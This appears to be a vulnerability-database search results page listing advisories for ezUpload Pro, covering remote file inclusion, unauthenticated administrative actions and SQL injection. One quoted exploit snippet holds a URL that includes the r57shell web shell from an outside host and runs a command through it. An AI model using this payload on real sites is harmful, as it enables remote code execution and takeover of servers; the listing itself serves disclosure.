34 matches found
EUVD-2005-4304
Malware in sbrugna...
EUVD-2006-2693
Malware in sbrugna...
EUVD-2005-4303
Malware in sbrugna...
ezUpload 2.2 initialize.php path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues ...
ezUpload 2.2 form.php path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues ...
ezUpload 2.2 customize.php path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues ...
ezUpload 2.2 index.php path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues ...
CVE-2006-3939
ScriptsCenter ezUpload Pro 2.2.0 allows remote attackers to perform administrative activities without authentication in 1 filter.php, which permits changing the Extensions Mode file type; 2 access.php, which permits changing the Protection Method; 3 edituser.php, which permits adding upload...
CVE-2006-3939
CVE-2006-3939 affects ScriptsCenter ezUpload Pro 2.2.0. The vulnerability allows remote, unauthenticated administrative actions via multiple scripts: filter.php (changes to Extensions Mode file type), access.php (changes to Protection Method), edituser.php (adds upload privileges to user accounts...
CVE-2006-3939
ScriptsCenter ezUpload Pro 2.2.0 allows remote attackers to perform administrative activities without authentication in 1 filter.php, which permits changing the Extensions Mode file type; 2 access.php, which permits changing the Protection Method; 3 edituser.php, which permits adding upload...
EzUpload multi file vulnerabilities
I don't know anyone report this but I have detected this when test EzUpload Pro 2.2.0 Attacker can re-config EzUpload system without login. File: filter.php -- change Extensions Mode file type. File: access.php -- change Protection Method accept anyone upload file File: edituser.php -- Add user w...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
Multiple PHP remote file inclusion vulnerabilities in EzUpload Pro 2.10 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to 1 form.php, 2 customize.php, and 3 initialize.php...
CVE-2006-2694
CVE-2006-2694 affects EzUpload Pro 2.10 and describes multiple PHP remote file inclusion vulnerabilities. The issue allows remote attackers to execute arbitrary PHP code by providing a URL in the path parameter to any of three scripts: form.php, customize.php, and initialize.php. The underlying r...
multiple file include exploits in EzUpload Pro v2.10
multiple file include exploits in EzUpload Pro v2.10 forum type : EzUpload Pro v2.10 bug found by : black-code & sweet-devil team : site-down type : file include exploits : form.php http://www.example.com/path/form.php?path=http://rst.void.ru/download/r57shell.txt?&cmd=pwd customize.php...
CVE-2005-4309
SQL injection vulnerability in ezUpload Pro 2.2 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search module parameters...
CVE-2005-4308
index.php in ezUpload Pro 2.2 and earlier allows remote attackers to include files via the mode parameter...
CVE-2005-4309
SQL injection vulnerability in ezUpload Pro 2.2 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified search module parameters...
CVE-2005-4308
index.php in ezUpload Pro 2.2 and earlier allows remote attackers to include files via the mode parameter...